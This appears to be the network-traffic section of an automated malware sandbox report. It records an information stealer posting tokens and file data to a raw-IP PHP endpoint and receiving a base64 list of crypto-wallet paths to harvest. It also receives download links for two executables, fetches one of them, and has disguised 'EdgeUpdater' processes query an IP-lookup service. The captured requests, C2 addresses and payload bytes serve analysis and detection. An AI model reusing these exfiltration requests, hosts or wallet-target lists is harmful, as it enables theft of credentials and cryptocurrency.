                                                                                                                                                                                                                                          Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.478563070 CEST464OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 265
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="message"files------ECBGIEHDBAAFIDGDAAAA--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.662208080 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:18 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.668451071 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="file"------GDGHIDBKJEGIECBGIEHC--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.873785973 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:18 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.877903938 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="message"ybncbhylepme------EHCAEGDHJKFHJKFIJKJE--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.090476036 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:18 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 172
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 62 47 52 74 63 79 38 32 4e 6d 5a 69 5a 6d 4e 6a 5a 44 67 7a 4e 32 46 6a 58 33 5a 68 5a 47 64 6e 5a 48 4e 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d
                                                                                                                                                                                                                                          Data Ascii: aHR0cDovLzE0Ny40NS40NC4xMDQvbGRtcy82NmZiZmNjZDgzN2FjX3ZhZGdnZHNhLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwwfDB8U3RhcnR8NHw=
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:20.493874073 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJD
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGDAEBGIDBGHIECBGHJD--


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          15192.168.2.658593147.45.44.10480
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.160254002 CEST93OUTGET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792851925 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:19 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 391072
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfcc9-5f7a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>z*bS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!*q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792866945 CEST224INData Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a
                                                                                                                                                                                                                                          Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#b*Tg}qB[zl_63Bu!g<NS_V?i^</*V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792890072 CEST1236INData Raw: 0b 4c 17 ac 37 28 a6 8e 84 49 22 99 54 e8 cf 25 7b d0 08 e2 76 37 e3 b2 fc 3f cf 7d 76 d5 7b 33 28 b2 b2 fe c0 a9 f2 48 69 50 7c c4 b4 e3 ba 74 d9 b1 37 61 8e 8d d3 76 2e 0d 98 3e 2d b3 0c 31 39 02 32 6f cc 9a bc 79 57 b8 f2 6a 28 4e 9c 8e df 86
                                                                                                                                                                                                                                          Data Ascii: L7(I"T%{v7?}v{3(HiP|t7av.>-192oyWj(NpP/g4s?lfgyl5wg.L+qY/lD:!ohx19dKN_"aZMn:_}pE24D75$J ]1"[]2/YJ+_&Fg0
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792929888 CEST1236INData Raw: 28 f9 78 ec 3d b4 38 89 d2 1c 14 0a d6 5b a8 72 30 a9 11 72 c3 0e 98 eb 71 fe 3f b8 9f 7f 16 66 c0 96 12 a1 38 f1 28 dd 2d 19 f7 e3 19 f0 11 f2 d4 4c c0 0b 22 92 58 72 75 b5 57 63 30 57 9b 60 da bd 1a e6 f0 98 fe 56 15 79 fc 0c 9b 58 78 04 ae cb
                                                                                                                                                                                                                                          Data Ascii: (x=8[r0rq?f8(-L"XruWc0W`VyXx/1|W3tdFSM9Hl@#x?R|5W5;E8{eo7<yHDt<q$@xfDFC+|Ev+E-HOT+v`Sz7[oZ:po!
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792943954 CEST1236INData Raw: 13 76 44 dc 11 1a e6 39 b7 26 a6 9f 7d 75 da ef 47 f4 dc 1d a2 dd 65 94 3c 0f b8 6a 1d 86 d2 7c 5d a6 4a c0 47 92 a3 4f 0a 42 9f 94 33 1b e3 62 3a 90 79 55 dc 61 03 00 d2 c9 a7 71 1a 94 ff 08 5c d8 be 64 0a e4 99 47 b2 26 4f c7 ce 4f 0d df d1 0f
                                                                                                                                                                                                                                          Data Ascii: vD9&}uGe<j|]JGOB3b:yUaq\dG&OO{|=`:OHvbB|&y]SCQ>0'K#xJ,dS-sI!?B<`=+[s@eW7/I3<UnJ(<bs3.6aI9%N,Cm
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.792962074 CEST1236INData Raw: 35 cc 2a 5d bd e7 3e ab d7 9b 67 7a 3c 30 f5 13 ad 15 9e b1 31 59 6d 19 ff f6 dd a5 69 c8 f8 6a b5 c6 eb 79 43 3b 9a 2e 82 27 4b 5b 11 0e 29 ba 47 d4 8a 4d d2 09 c3 13 68 a9 69 20 54 a7 8b e6 6c c3 20 3c 46 39 5a 84 c0 77 1c 7f dc b5 e7 ff f9 fd
                                                                                                                                                                                                                                          Data Ascii: 5*]>gz<01YmijyC;.'K[)GMhi Tl <F9Zw1+u3#j4Vd+rH=b|?\K7?>jTS_LzM\VAz2WI8:klnqVC=L}R5?La$
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.793030024 CEST1236INData Raw: 86 5b ac 1b 58 a1 ec 1a 3c f9 f9 64 38 78 1a 43 18 c0 71 15 af e2 61 84 4c 4f 4e be 3c f6 0b 2b 27 5b 46 63 e6 98 b9 73 1a 1a f1 e2 3d 60 d2 a2 26 6e 49 b6 38 92 b4 ab c3 28 20 dd dd 13 ff c8 af 6f 1e 17 3f 56 74 59 51 ea b4 ce 69 50 b4 2b 5e 2e
                                                                                                                                                                                                                                          Data Ascii: [X<d8xCqaLON<+'[Fcs=`&nI8( o?VtYQiP+^.0 1_f(WgGx:u8}WRz5xZ|B`X8DFi1c[rWV@>9bJh[V*.T%0R_p7]l4FFv[VBQ
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.793051004 CEST1236INData Raw: ab 93 0a a0 95 fe e2 a4 78 91 28 31 24 75 ea 5c 76 ba 3f 79 d1 c7 ff 4e 38 da 2f bb 6a 23 a7 e4 85 54 58 59 f8 b0 95 d3 84 ad d3 d9 b9 21 19 cb 1d f3 98 d0 29 3c 3d bb 97 0c 44 d8 f7 8a d7 36 ac ea fc d4 95 ef 67 2f 47 ca a1 ab 60 a6 bb 14 9c 6d
                                                                                                                                                                                                                                          Data Ascii: x(1$u\v?yN8/j#TXY!)<=D6g/G`m9&}a+:[v$JRX\PJ2e]W-DkQ-}iDkq*8]RzjR$(ZUFU:PIdO)B@WP5E['PzK
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.793062925 CEST1236INData Raw: 7a 9a 43 18 30 f9 54 6a 5f 58 e5 be d3 f4 2e fd 17 65 55 69 05 66 be af 33 26 e4 a5 55 46 8e b8 17 38 c6 b2 ff ad 14 8b 53 57 8e 3e e6 50 95 6b 1f eb 90 11 72 25 13 eb d3 a5 3d a0 23 01 7f ad bb 6c b4 a9 3f ee 0f ea 4a e3 c9 1a 9e 33 bb 62 3c ee
                                                                                                                                                                                                                                          Data Ascii: zC0Tj_X.eUif3&UF8SW>Pkr%=#l?J3b<DsHW,I\'}V*(a/d1d|89}so$HiL0-LymB|Irr&7xY3 u<7}#=6`$"7i~S
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.793081045 CEST1236INData Raw: 40 23 fc bb 6a f9 f1 85 7b 51 38 aa d0 66 c0 9a f4 5a 25 8f 15 05 ae b1 8d c4 4c 34 73 48 27 1f f0 19 1c f3 f7 31 17 37 fd 46 0f 55 fd c1 9d c8 4f 2b 8a c1 ae 17 5d 75 ef 5d d2 67 9e ef c2 4a 2f 6c 64 77 57 bb 09 d5 f6 4b f1 e2 e4 6e 88 58 2e f2
                                                                                                                                                                                                                                          Data Ascii: @#j{Q8fZ%L4sH'17FUO+]u]gJ/ldwWKnX.o/HM5{}{fYu&b;+W8ug$P?A0cOqf8mj~vu$N><j6~k=)>jm}F+"(9
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:19.797797918 CEST1236INData Raw: 1b 05 d9 66 fa 20 c8 b0 02 bc eb 6e 79 9f 25 25 c6 2a 9a 28 93 e8 a3 a2 2f 83 9e 43 70 50 59 f0 d4 46 05 64 2c ed 9f f9 5a 9f 22 24 21 e6 75 23 00 0c 2c 67 9b 26 a1 fe d5 01 05 99 03 2b 1a c4 4a 40 1e bc 2b 19 51 8d 50 40 aa 22 8a 4c 91 16 d3 bf
                                                                                                                                                                                                                                          Data Ascii: f ny%%*(/CpPYFd,Z"$!u#,g&+J@+QP@"L|)CKq$INOL|<g<!@&ZLW1=?.zpq_qQV8V"9|;EZu*op`Kh[vMgO|rvz<Z5


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          16192.168.2.658603104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:29.221649885 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:29.904170036 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:29 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8bd2a1243f9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:29.904288054 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:29 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8bd2a1243f9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          17192.168.2.658606104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:31.110600948 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:31.601037979 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8c91e0c5e82-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          18192.168.2.658608104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:31.430905104 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:31.894785881 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8cafd7043be-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


